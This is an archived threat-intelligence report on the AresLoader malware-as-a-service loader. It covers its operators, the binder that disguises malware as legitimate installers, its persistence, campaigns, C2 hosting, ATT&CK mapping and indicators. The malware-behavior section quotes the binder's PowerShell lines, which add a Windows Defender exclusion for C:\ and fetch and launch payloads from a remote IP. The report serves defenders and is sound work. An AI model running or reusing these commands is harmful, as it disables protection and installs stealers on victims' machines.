{
	"id": "bb96d929-6123-462e-a4e3-259a83e3ae7c",
	"created_at": "2026-04-06T01:31:02.290317Z",
	"updated_at": "2026-04-10T03:21:14.196845Z",
	"deleted_at": null,
	"sha1_hash": "7642a07d9ea2b3e38b3c8d613a5b4f308af6dd5a",
	"title": "New loader on the bloc - AresLoader",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 400994,
	"plain_text": "New loader on the bloc - AresLoader\r\nBy Intel 471\r\nPublished: 2026-04-01 · Archived: 2026-04-06 00:49:12 UTC\r\nAresLoader is a new loader malware-as-a-service (MaaS) offered by threat actors with links to Russian hacktivism\r\nthat was spotted recently in the wild. Most users are pushing a variety of information stealers with the service. The\r\nservice offers a “binder” tool that allows users to masquerade their malware as legitimate software.\r\nWe would like to acknowledge Roberto Martinez and Taisiia Garkava for alerting us to their in-the-wild\r\nobservations of AresLoader and sharing their observations with us.\r\nThe actors behind the loader\r\nIn late November 2022, a threat actor using the handle AiD Lock aka DarkBLUP announced a new MaaS\r\nprogram called AresLoader on Telegram. The actor subsequently announced the service on the popular\r\nunderground forums RAMP and XSS. The actor claimed the malware loader was written in the C programming\r\nlanguage and allegedly is undetectable by Windows Defender antivirus software.\r\nPreviously our cyber intelligence team had associated AiD Lock with PHANTOM DEV aka Dead X Inject, and\r\nthe DeadXInject Hack group, along with also offering the AiD Locker ransomware-as-a-service (RaaS) program.\r\nTest image\r\nThe hacktivism - cybercrime crossover continues\r\nThe group we associated AiD Lock with, PHANTOM DEV, engaged in hacktivist activities in mid-2022 and\r\nclaimed affiliation with the Red Hackers Alliance Russia aka RHA, RHA R pro-Russian hacktivist group.\r\nhttps://intel471.com/blog/new-loader-on-the-bloc-aresloader\r\nPage 1 of 7\n\nEvidence suggests multiple members of this group are either users or administrators of the AresLoader MaaS. This\r\ntrend is not surprising and something that is being seen more frequently from hacktivist groups, who usually focus\r\non distributed denial-of-service (DDoS) attacks. However, the shift in tactics, techniques and procedures (TTPs)\r\nof these groups to align more closely with cybercriminals, while supporting nation-state political objectives,\r\ncontinues to be observed more frequently.\r\n[Image: Red Hackers Alliance Telegram channel April 15, 2022. - Figure 2 - Red Hackers Alliance Telegram\r\nchannel April 15, 2022.]\r\nAresLoader - Malware-as-a-service breakdown\r\nThe AresLoader MaaS costs US $300 per month and includes five builds that allegedly are “packed manually.”\r\nThe AresLoader panel offers an optional binder service in which a legitimate file is merged with the malicious\r\nloader.\r\n[Image: The binder service upload page Dec. 27, 2022. - Figure 3 - The binder service upload page Dec. 27,\r\n2022.]\r\nThe idea is that the malicious payload can masquerade as a legitimate file, often an installer for popular software.\r\nThe binder works by writing a stub launcher that will launch the original legitimate executable, then write a batch\r\n(.bat) file to disk and execute that .bat file with “cmd.exe.”\r\n[Image: The process tree of the binder payload, which depicts two execution paths — legitimate and malicious —\r\nMarch 13, 2023. - Figure 4 - The process tree of the binder payload, which depicts two execution paths —\r\nlegitimate and malicious — March 13, 2023.]\r\nThe .bat file contains three PowerShell commands that perform three tasks:\r\n1. Add “C:\\” to the Windows Defender exclusion paths via:\r\nAdd-MpPreference -ExclusionPath ('C:\\\\')\r\n2. Fetch the malicious payload from a remote URL and execute it via:\r\nWGet (http://5.75.248[.]207/emsabp32.dll) -OutfilE $EnV:AlLuSErSpRoFiLe\\\\emsabp32.dll;\r\nStARt-proCEss $EnV:aLluseRspROFiLE\\\\emsabp32.dll\r\nIn this case, a Raccoon Stealer payload with the\r\n24de09bb454b0318af20ffcc21c6dd4ad5d6627cab7d7bfcb5c2278f63a2c3b7 SHA-256.\r\n3. The third PowerShell command fetches and launches a .bat file that uses rundll32.exe to execute the target\r\npayload — emsabp32.dll in this case.\r\nWget (http[:]//5.75.248[.]207/rundll32.bat) -oUtFIle $env:aLluSerSPROfIle\\\\rundll32.bat; sTArT-proCESS\r\n$EnV:aLluSErsPRoFILE\\\\rundll32.bat\r\nhttps://intel471.com/blog/new-loader-on-the-bloc-aresloader\r\nPage 2 of 7\n\n.bat file - start rundll32.exe emsabp32.dll, _Start@1\r\nMalware behavior\r\nAresLoader has basic download and execute capabilities. Upon execution, it checks if it is running as an\r\nadministrator. If not, it attempts to escalate its privileges using the ShellExecuteA application programming\r\ninterface (API) and “runas” command.\r\n[Image: A privilege escalation attempt observed March 13, 2023. - Figure 5 - A privilege escalation attempt\r\nobserved March 13, 2023.]\r\nTo remain persistent, it sets a scheduled task and also adds a key to the\r\n“\\HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\” registry key.\r\n[Image: The image depicts the persistence mechanism — scheduled task observed March 13, 2023. - Figure 6 -\r\nThe image depicts the persistence mechanism — scheduled task observed March 13, 2023.]\r\n[Image: The persistence mechanism — Run registry key observed March 13, 2023. - Figure 7 - The persistence\r\nmechanism — Run registry key observed March 13, 2023.]\r\nDistribution methods\r\nCampaign one — SystemBC, Amadey direct install\r\nIntel 471 first observed AresLoader in the wild Jan. 26, 2023. It was dropped by SystemBC (C2: 89.22.225[.]242)\r\nand later by the Amadey version 3.50 controller (C2: 85.209.135[.]109), both times fetched from the same drop\r\nlocation — the http[:]//5.75.248[.]207/loader.exe link.\r\n[Image: The download and execute commands received by Intel 471 tracking systems captured March 13, 2023. -\r\nFigure 8 - The download and execute commands received by Intel 471 tracking systems captured March 13,\r\n2023.]\r\nIn addition to the AresLoader sample, the Laplas clipper was installed from the same IP address that day. The\r\nthreat actors first tried to install this payload directly following the infection chain:\r\nSystemBC download and execute command a follow-up payload from the URL:\r\nhttp[:]//5.75.248[.]207/avicapn32.exe\r\nLaplas clipper (Golang variant) downloaded sample SHA-256 from the URL above:\r\n7cffcc27c8ab249e6e669274dd40d5ad138daa7f71548a5dfbb4b112db1053e2\r\nThey then shipped a second payload — a lightly obfuscated PowerShell script to download and fetch the above\r\nLaplas sample — from the URL http[:]//5.75.248[.]207/cmpbksrvc32.cmd.\r\nThe threat actor made a feeble attempt to bypass security measures by installing the same payload via a different\r\nmethod.\r\nhttps://intel471.com/blog/new-loader-on-the-bloc-aresloader\r\nPage 3 of 7\n\nWe tracked this AresLoader customer by monitoring the behavior of the SystemBC and Amadey botnets they\r\ncontrol. We observed the actor operating the loader in this instance likes to drop information-stealer malware,\r\nprimarily Laplas, on victim machines and subsequently cryptocurrency miner payloads.\r\nCampaign two — Using AresLoader binder service\r\nA similar campaign to push AresLoader was discovered by malware researchers Roberto Martinez and Taisiia\r\nGarkava. In this case, several Raccoon Stealer samples were found dropping AresLoader. This AresLoader sample\r\n(40003d01db9c34da73a415792dba3a617fab65e91d2aae7bbbcd335af198a66b) dropped StealC and SystemBC\r\npayloads. The Raccoon Stealer payload was masquerading as an installer for a legitimate application called Revo\r\nUninstaller Pro. The threat actor likely used the binder service available through the AresLoader control panel.\r\n[Image: The legitimate software installer window that is launched in tandem with the malicious payload. - Figure\r\n9 - The legitimate software installer window that is launched in tandem with the malicious payload.]\r\nThe aforementioned .bat file that calls the payload with rundll32.exe sheds additional light on the use of the\r\nAresLoader binder feature. The VirusTotal intelligence platform shows parent payloads of the .bat file that all\r\nmasquerade as common freeware.\r\n[Image: Some malicious files found on VirusTotal that probably were created using the AresLoader binder service.\r\n- Figure 10 - Some malicious files found on VirusTotal that probably were created using the AresLoader binder\r\nservice.]\r\nPayloads\r\nNot many instances of AresLoader have been discovered in the wild at present, but the loader MaaS does appear\r\nto have a few “customers.” Payloads Intel 471 and other researchers have observed thus far include:\r\nSystemBC – A back door and socket secure internet protocol (SOCKS) proxy tunnel.\r\nLumma Stealer – A popular stealer MaaS.\r\nStealC – A new stealer MaaS that offers a configurable targeting system.\r\nAurora Stealer – A stealer MaaS written in the Golang programming language.\r\nLaplas clipper – A cryptocurrency clipper written in .NET and Golang.\r\nHosting\r\nThe AresLoader command and control (C2) infrastructure has been hosted at virtual private server (VPS)\r\nproviders in Germany, the Netherlands and Russia.\r\nIP address Country ASN\r\n162.55.187[.]234 DE AS24940 Hetzner Online GmbH\r\n193.168.49[.]8 RU AS198610 Beget LLC\r\n37.220.87[.]62 NL AS204603 Partner LLC\r\nhttps://intel471.com/blog/new-loader-on-the-bloc-aresloader\r\nPage 4 of 7\n\n5.161.88[.]63 US AS213230 Hetzner Online GmbH\r\n5.75.240[.]155 DE AS24940 Hetzner Online GmbH\r\n62.217.180[.]55 RU AS198610 Beget LLC\r\n62.217.180[.]92 RU AS198610 Beget LLC\r\n62.217.181[.]4 RU AS198610 Beget LLC\r\nIntel 471 recommendations\r\nWe recommend defenders evaluate the following suggested measures for implementation in their environments:\r\nFlag scheduled tasks added via .bat or .cmd files.\r\nTurn on PowerShell logging.\r\nFlag changes to Defender exception list via “Add-MpPreference -ExclusionPath.”\r\nEnforce evaluation of code signing for .exe files and MSI installers to detect tampering.\r\nMITRE ATT\u0026CK® techniques\r\nThis report uses the MITRE ATT\u0026CK® aka Adversarial Tactics, Techniques and Common Knowledge\r\nframework.\r\nTechnique Title ID Use\r\nExecution [TA0002]\r\nCommand and scripting\r\ninterpreter: PowerShell\r\nT1059.001\r\nAresLoader uses a series of PowerShell scripts to load\r\nwhichever malware it is loading for that campaign.\r\nUser execution: Malicious file T1204.002\r\nAresLoader depends on victims executing the\r\ndownloaded executable.\r\nPersistence [TA0003]\r\nScheduled Task/Job T1053.005 AresLoader uses a Scheduled Task to gain persistence.\r\nPrivilege Escalation [TA0004]\r\nAbuse elevation control\r\nmechanism: Elevated execution\r\nwith prompt\r\nT1548.004\r\nAresLoader attempts to elevate privileges by executing\r\nitself with administrator privileges via ShellExecuteA\r\nand “runas.”\r\nDefense Evasion [TA0005]\r\nImpair defenses: Disable or\r\nmodify tools\r\nT1562.001\r\nAresLoader modifies Windows Defender by setting an\r\nexclusion.\r\nhttps://intel471.com/blog/new-loader-on-the-bloc-aresloader\r\nPage 5 of 7\n\nMasquerading: Match legitimate\r\nname or location\r\nT1036.005\r\nAresLoader masquerades as a legitimate installer for\r\nmultiple software utilities by using a binder to execute\r\nPowerShell commands.\r\nCommand and Control [TA0011]\r\nApplication layer protocol: web\r\nprotocols\r\nT1071.001\r\nAresLoader uses HTTP/HTTPS to communicate with its\r\nC2.\r\nResource Development [TA0042]\r\nDedicated VPS Infrastructure T1584.003\r\nAresLoader MaaS operators rent VPSs to host the\r\nAresLoader control panel and malicious payloads.\r\nIndicators\r\nIndicator value Indicator description\r\nhttp[:]//193[.]168[.]49[.]8 AresLoader controller URL\r\nhttp[:]//62[.]217[.]181[.]4 AresLoader controller URL\r\nhttp[:]//162[.]55[.]187[.]234 AresLoader controller URL\r\nhttp[:]//37[.]220[.]87[.]62 AresLoader controller URL\r\nhttp[:]//45[.]80[.]69[.]193 AresLoader controller URL\r\nhttp[:]//5[.]161[.]88[.]63 AresLoader controller URL\r\nhttp[:]//5[.]75[.]240[.]155 AresLoader controller URL\r\nhttp[:]//62[.]217[.]180[.]55 AresLoader controller URL\r\nhttp[:]//62[.]217[.]180[.]92 AresLoader controller URL\r\n169c70fc77814578aa83b3a666eb674c49e60ac6964b040de9b1e51c5966bf56 AresLoader sample\r\n40003d01db9c34da73a415792dba3a617fab65e91d2aae7bbbcd335af198a66b AresLoader sample\r\n5c5829697e65e815e41670a142a90251297f8cff94282837c09443b9c1ebad26 AresLoader sample\r\n7572b5b6b1f0ea8e857de568898cf97139c4e5237b835c61fea7d91a6f1155fb AresLoader sample\r\n7f53135e532f1799d5c77727e47bf8f25a0c1381e9684c9c9fb2d2d0cd0ab2e4 AresLoader sample\r\n812d4d9446b7962344e389b9498d08dabce1c9113bb18f554633da7e5992c4a3 AresLoader sample\r\n839cef8414117e4181cb87b998e90fb3dad81463f8c219966cb59147e2d7c2cb AresLoader sample\r\nhttps://intel471.com/blog/new-loader-on-the-bloc-aresloader\r\nPage 6 of 7\n\nb280e418cc13c8f1efe66c8c5f4b83e0a544ddbb9d0c460e24d279b93a22c5b3 AresLoader sample\r\nbcec1f5dcdc03772d33bc63922603129c6eaf56358a7b5f4a4583c65766d71da AresLoader sample\r\nf46b9aeafe296ebbad909e927fad26a21b05fbbc68cb446299c224fd27ea7fb0 AresLoader sample\r\nhttp[:]//89[.]22[.]225[.]242[:]4193\r\nSystemBC controller\r\naddress\r\nhttp[:]//85[.]209[.]135[.]109/jg94cVd30f/index.php Amadey controller URL\r\nhttp[:]//5[.]75[.]248.207/loader[.]exe AresLoader download URL\r\nhttp[:]//5[.]75[.]248[.]207/avicapn32[.]exe Laplas download URL\r\nhttp[:]//5[.]75[.]248[.]207/cmpbksrvc32[.]cmd PowerShell download URL\r\nSource: https://intel471.com/blog/new-loader-on-the-bloc-aresloader\r\nhttps://intel471.com/blog/new-loader-on-the-bloc-aresloader\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://intel471.com/blog/new-loader-on-the-bloc-aresloader"
	],
	"report_names": [
		"new-loader-on-the-bloc-aresloader"
	],
	"threat_actors": [],
	"ts_created_at": 1775439062,
	"ts_updated_at": 1775791274,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7642a07d9ea2b3e38b3c8d613a5b4f308af6dd5a.pdf",
		"text": "https://archive.orkl.eu/7642a07d9ea2b3e38b3c8d613a5b4f308af6dd5a.txt",
		"img": "https://archive.orkl.eu/7642a07d9ea2b3e38b3c8d613a5b4f308af6dd5a.jpg"
	}
}